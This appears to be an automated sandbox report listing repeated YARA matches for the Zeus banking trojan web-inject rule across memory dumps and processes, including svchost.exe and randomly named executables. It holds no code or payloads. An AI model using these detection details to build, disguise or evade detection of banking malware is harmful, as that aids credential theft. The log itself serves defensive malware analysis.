Source: 00000002.00000003.1986550806.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1972618902.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2611248672.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000011.00000002.1812866141.0000000002260000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1964073452.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1373943903.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1972290685.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1945209264.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000016.00000002.1820145637.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.1832859184.0000000001340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1819357336.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1939680900.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1374033112.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1965323651.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1849125917.0000000004900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000027.00000002.2056889554.0000000000E80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1991341795.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1964333284.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000016.00000002.1841274589.00000000024A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2611248672.00000000024A6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1987592676.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1936202051.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1877311393.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1994177586.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000027.00000002.2057701274.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.1873138668.0000000001320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000011.00000002.1813283213.00000000022C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001A.00000002.1934748852.0000000002090000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1972865082.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1779871289.000000000E2C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000018.00000002.1875591417.0000000003060000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.1817233105.00000000024B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: uavINoSIQh.exe PID: 7384, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: svchost.exe PID: 7444, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 4084, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 2604, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 6304, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 4628, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 6964, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 5632, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
